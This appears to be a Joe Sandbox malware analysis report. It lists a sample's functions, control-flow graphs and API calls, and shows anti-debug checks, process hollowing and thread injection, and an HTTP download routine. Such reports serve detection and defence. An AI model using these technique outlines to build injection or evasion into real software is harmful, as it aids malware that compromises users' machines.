Function_00007FF6EC8500AA 98 Function_00007FF6EC8436AC 99 Function_00007FF6EC84E9A9 100 Function_00007FF6EC84E9B3 101 Function_00007FF6EC84FAB3 102 Function_00007FF6EC84DEB4 104 Function_00007FF6EC84CE9D 105 Function_00007FF6EC84E796 108->19 108->50 108->51 108->92 108->93 109 Function_00007FF6EC842E9C 110 Function_00007FF6EC84E7A5 111->24 111->35 113 Function_00007FF6EC84F1A1

                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                        Function 00007FF6EC84340C Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 231 7ff6ec84340c-7ff6ec843422 call 7ff6ec84153c call 7ff6ec8431ac 236 7ff6ec84342c-7ff6ec84345a call 7ff6ec8440a4 call 7ff6ec843ca4 call 7ff6ec843ed4 231->236 237 7ff6ec843424-7ff6ec843426 ExitProcess 231->237 244 7ff6ec84345c-7ff6ec84346d call 7ff6ec8441e4 236->244 245 7ff6ec8434ab-7ff6ec8434be call 7ff6ec843ed4 236->245 250 7ff6ec84346f-7ff6ec843480 call 7ff6ec8441e4 244->250 251 7ff6ec843482-7ff6ec843484 ExitProcess 244->251 252 7ff6ec8434fc-7ff6ec84350f call 7ff6ec843ed4 245->252 253 7ff6ec8434c0-7ff6ec8434d1 call 7ff6ec8441e4 245->253 250->251 262 7ff6ec84348a call 7ff6ec84329c 250->262 263 7ff6ec843511-7ff6ec843522 call 7ff6ec8441e4 252->263 264 7ff6ec843552-7ff6ec843568 call 7ff6ec843a34 call 7ff6ec84339c 252->264 260 7ff6ec8434db call 7ff6ec84320c 253->260 261 7ff6ec8434d3-7ff6ec8434d5 ExitProcess 253->261 269 7ff6ec8434e0-7ff6ec8434e5 260->269 271 7ff6ec84348f-7ff6ec843494 262->271 278 7ff6ec84352c call 7ff6ec84320c 263->278 279 7ff6ec843524-7ff6ec843526 ExitProcess 263->279 283 7ff6ec84356a-7ff6ec84357b call 7ff6ec8441e4 264->283 284 7ff6ec8435be-7ff6ec843696 CreateThread * 3 WaitForMultipleObjects ExitProcess 264->284 273 7ff6ec8434e7-7ff6ec8434f2 Sleep 269->273 274 7ff6ec8434f4-7ff6ec8434f6 ExitProcess 269->274 276 7ff6ec843496-7ff6ec8434a1 Sleep 271->276 277 7ff6ec8434a3-7ff6ec8434a5 ExitProcess 271->277 273->269 276->271 282 7ff6ec843531-7ff6ec843536 278->282 285 7ff6ec843538-7ff6ec843543 Sleep 282->285 286 7ff6ec843545-7ff6ec843547 ExitProcess 282->286 289 7ff6ec84357d-7ff6ec84358e call 7ff6ec8441e4 283->289 290 7ff6ec843590-7ff6ec843592 ExitProcess 283->290 285->282 289->290 293 7ff6ec843598 call 7ff6ec84329c 289->293 295 7ff6ec84359d-7ff6ec8435a2 293->295 296 7ff6ec8435b1-7ff6ec8435b3 ExitProcess 295->296 297 7ff6ec8435a4-7ff6ec8435af Sleep 295->297 297->295
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                        • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                        • API String ID: 613740775-1953711635
                                                                                                                                                                                                                        • Opcode ID: bf68687e6b01dd2cdedf4b69bf2d9525eb465aa07acbe71fc6d32d66f4173cd5
                                                                                                                                                                                                                        • Instruction ID: 503bce49048e53e40541b341e45bc146380f239c6a33232cd56c1e89f04c6c1b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf68687e6b01dd2cdedf4b69bf2d9525eb465aa07acbe71fc6d32d66f4173cd5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF612F33A1874381FB64A731EA553BB6AA8BFA4305F500036D54EC66D5DE3FE50BC60A
                                                                                                                                                                                                                        Function 00007FF6EC8440A4 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 434396405-0
                                                                                                                                                                                                                        • Opcode ID: 8b899918add7223f465711b73e7ae69a3ba479ef6b9dac702c2211ef63433b4c
                                                                                                                                                                                                                        • Instruction ID: d376cef746825bb56d9334072722086d35258516cf36d67e22c2b62f7f59ba1e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b899918add7223f465711b73e7ae69a3ba479ef6b9dac702c2211ef63433b4c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC311832618A81C6D750DB15E95072BBBA8FBD4784F105136FA8E83B68DF7ED442CB09
                                                                                                                                                                                                                        Function 00007FF6EC8431AC Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3920101602-0
                                                                                                                                                                                                                        • Opcode ID: a6f9905a68a37330863b423cf03472073815be279c54a0a408a746d7c81f1aaa
                                                                                                                                                                                                                        • Instruction ID: f935717f70e07ae6f3ee91d8d3d303bcede178da4bc23e39964a7c8e46c8127a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6f9905a68a37330863b423cf03472073815be279c54a0a408a746d7c81f1aaa
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8CF0826290C282C1F7305B25AA0533B2FE8BB65708F040175E58DC6394CF2ED50BDB1B
                                                                                                                                                                                                                        Function 00007FF6EC8441E4 Relevance: 4.5, APIs: 3, Instructions: 21synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4294037311-0
                                                                                                                                                                                                                        • Opcode ID: bf3485979edfa6433492db17b946e1c3c98b3791ee27d21d87cd92ad9d6d8dc2
                                                                                                                                                                                                                        • Instruction ID: d57ff5c232024fb5e465e685e0138b504295d95481b28de52d114c66bfe95820
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf3485979edfa6433492db17b946e1c3c98b3791ee27d21d87cd92ad9d6d8dc2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32F0303690C751C2EA606B20B50437B6B69FB96701F502439D98EC3A54CF3ED407D60A
                                                                                                                                                                                                                        Function 00007FF6EC8414EC Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 328 7ff6ec8414ec-7ff6ec841528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00007FF6EC8415F1,?,?,?,?,?,?,?,?,00007FF6EC843418), ref: 00007FF6EC8414FF
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,00007FF6EC8415F1,?,?,?,?,?,?,?,?,00007FF6EC843418), ref: 00007FF6EC841514
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2574300362-0
                                                                                                                                                                                                                        • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction ID: 0f6921b25e82d0f1a1fad9f77aa49d0e77a40230a9075f2808917d8fcca0e5bb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34E09276518F80C6C6209B15F84011ABBB4FBC8795F504125EACD82B28CF3DC165CB04
                                                                                                                                                                                                                        Function 00007FF6EC843AE4 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 329 7ff6ec843ae4-7ff6ec843af3 330 7ff6ec843b08-7ff6ec843b0c 329->330 331 7ff6ec843af5-7ff6ec843b02 VirtualFree 329->331 331->330
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                                                                        • Opcode ID: 19106ccd0018fcd50527fbd11ca19c825cdf565e5c439e3b620bbfd6b909e770
                                                                                                                                                                                                                        • Instruction ID: ea882aa8b8e05b600035e98eff2498f64965a96ebdde9f1229537d952643a848
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19106ccd0018fcd50527fbd11ca19c825cdf565e5c439e3b620bbfd6b909e770
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24D01222E38A41D1E7949B26E98971A6BA4FBC4744F808035E6C9C1664CF3DC19ACF05

                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                        Function 00007FF6EC8424CC Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 332 7ff6ec8424cc-7ff6ec842546 GetModuleFileNameW 333 7ff6ec842548 332->333 334 7ff6ec84254d-7ff6ec842589 332->334 335 7ff6ec842df1-7ff6ec842df9 333->335 336 7ff6ec84258b-7ff6ec842593 334->336 337 7ff6ec8425a1-7ff6ec8425bd call 7ff6ec84240c 334->337 338 7ff6ec8425bf-7ff6ec8425db call 7ff6ec84244c 336->338 339 7ff6ec842595-7ff6ec84259d 336->339 346 7ff6ec842600-7ff6ec84260a 337->346 338->346 341 7ff6ec8425dd-7ff6ec8425f9 call 7ff6ec84248c 339->341 342 7ff6ec84259f-7ff6ec8425fb 339->342 341->346 342->335 349 7ff6ec84260c 346->349 350 7ff6ec842611-7ff6ec842665 CreateProcessW 346->350 349->335 352 7ff6ec842667 350->352 353 7ff6ec84266c-7ff6ec8426ac CreateFileW 350->353 352->335 354 7ff6ec8426ae 353->354 355 7ff6ec8426b3-7ff6ec8426cf GetFileSize 353->355 354->335 356 7ff6ec8426db-7ff6ec8426e6 CloseHandle 355->356 357 7ff6ec8426d1-7ff6ec8426d9 355->357 356->335 357->356 358 7ff6ec8426eb-7ff6ec842713 VirtualAlloc 357->358 359 7ff6ec842725-7ff6ec842750 ReadFile 358->359 360 7ff6ec842715-7ff6ec842720 CloseHandle 358->360 361 7ff6ec842775-7ff6ec8427c3 CloseHandle GetThreadContext 359->361 362 7ff6ec842752-7ff6ec842770 VirtualFree CloseHandle 359->362 360->335 363 7ff6ec8427dd-7ff6ec842862 ReadProcessMemory GetModuleHandleA GetProcAddress 361->363 364 7ff6ec8427c5-7ff6ec8427d8 VirtualFree 361->364 362->335 366 7ff6ec84287c-7ff6ec8428e5 VirtualAllocEx 363->366 367 7ff6ec842864-7ff6ec842877 VirtualFree 363->367 364->335 368 7ff6ec8428e7-7ff6ec8428fa VirtualFree 366->368 369 7ff6ec8428ff-7ff6ec842933 WriteProcessMemory 366->369 367->335 368->335 370 7ff6ec84294d-7ff6ec842958 369->370 371 7ff6ec842935-7ff6ec842948 VirtualFree 369->371 372 7ff6ec84296a-7ff6ec84297d 370->372 371->335 373 7ff6ec842a2b-7ff6ec842a72 372->373 374 7ff6ec842983-7ff6ec842a0c WriteProcessMemory 372->374 377 7ff6ec842a84-7ff6ec842a97 373->377 375 7ff6ec842a26 374->375 376 7ff6ec842a0e-7ff6ec842a21 VirtualFree 374->376 375->372 376->335 379 7ff6ec842a9d-7ff6ec842aec RtlCompareMemory 377->379 380 7ff6ec842d1c-7ff6ec842da0 WriteProcessMemory SetThreadContext 377->380 381 7ff6ec842af0-7ff6ec842b19 379->381 382 7ff6ec842aee 379->382 383 7ff6ec842db7-7ff6ec842dc7 ResumeThread 380->383 384 7ff6ec842da2-7ff6ec842db5 VirtualFree 380->384 386 7ff6ec842b24-7ff6ec842b32 381->386 382->377 387 7ff6ec842dc9-7ff6ec842ddc VirtualFree 383->387 388 7ff6ec842dde-7ff6ec842deb VirtualFree 383->388 384->335 389 7ff6ec842b38-7ff6ec842bc3 386->389 390 7ff6ec842d17 386->390 387->335 388->335 391 7ff6ec842bd5-7ff6ec842be3 389->391 390->380 392 7ff6ec842be9-7ff6ec842c1c 391->392 393 7ff6ec842d12 391->393 394 7ff6ec842c20-7ff6ec842cf3 ReadProcessMemory WriteProcessMemory 392->394 395 7ff6ec842c1e 392->395 393->386 397 7ff6ec842d0d 394->397 398 7ff6ec842cf5-7ff6ec842d08 VirtualFree 394->398 395->391 397->393 398->335
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                                                                        • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                        • API String ID: 514040917-3001742581
                                                                                                                                                                                                                        • Opcode ID: cc9545668cbfd8d8ccb1ce63d766c7a505e34b9cdb4d5a45164daabb5f3f8071
                                                                                                                                                                                                                        • Instruction ID: 0fbcc363afb6fb714adb1831e2b59530208d01aa7d9f281040ebb247f36079bc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc9545668cbfd8d8ccb1ce63d766c7a505e34b9cdb4d5a45164daabb5f3f8071
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4132E13260CBC586E774CB16E9547AAABA4FB88B85F004136DA8EC3B58DF3DD445CB05
                                                                                                                                                                                                                        Function 00007FF6EC8410D8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: OpenProcess
                                                                                                                                                                                                                        • String ID: $@$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                        • API String ID: 3743895883-721857904
                                                                                                                                                                                                                        • Opcode ID: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction ID: eab237a8e4218a1a06cc4ef6636c4c2e9c4e7e3ed8971b59760cf36e8185ddfd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB711A32A0CA8186E770CB14E58436BBBA9FB84784F504135E68DC7B98DF7DD48ACB45
                                                                                                                                                                                                                        Function 00007FF6EC842160 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF6EC84219D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                        • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                        • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                        • Opcode ID: 3344087d9ea4d8767dad2cf8c1e5dc35776cf689aa0c01a0ee6867c1dab9e5ae
                                                                                                                                                                                                                        • Instruction ID: b226ffaff6b0192804b653f4ac2ccd00b736f22ac174157ffab9471f750bb9b6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3344087d9ea4d8767dad2cf8c1e5dc35776cf689aa0c01a0ee6867c1dab9e5ae
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1171E63261CB81C2E7549B55F59472FBBA4FBC4B94F101036EA8A83A68CF7ED485CB05
                                                                                                                                                                                                                        Function 00007FF6EC844524 Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2693768547-0
                                                                                                                                                                                                                        • Opcode ID: c083718f08d0c72eded97b33700526ef96675f7b3bff10be0d6bfba5df6ede19
                                                                                                                                                                                                                        • Instruction ID: ef8adb21122bd0b2697670f5f85f673db11461ee0d0f7774a3e6c2fbae90a268
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c083718f08d0c72eded97b33700526ef96675f7b3bff10be0d6bfba5df6ede19
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9481F632608B8182EA50CB55F58436BBBA5FBC9B95F104135EA8DC3B68DF7DD045CB05
                                                                                                                                                                                                                        Function 00007FF6EC84306C Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC844404: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC8430A7), ref: 00007FF6EC84444C
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC844404: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC8430A7), ref: 00007FF6EC844489
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC844404: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC8430A7), ref: 00007FF6EC844494
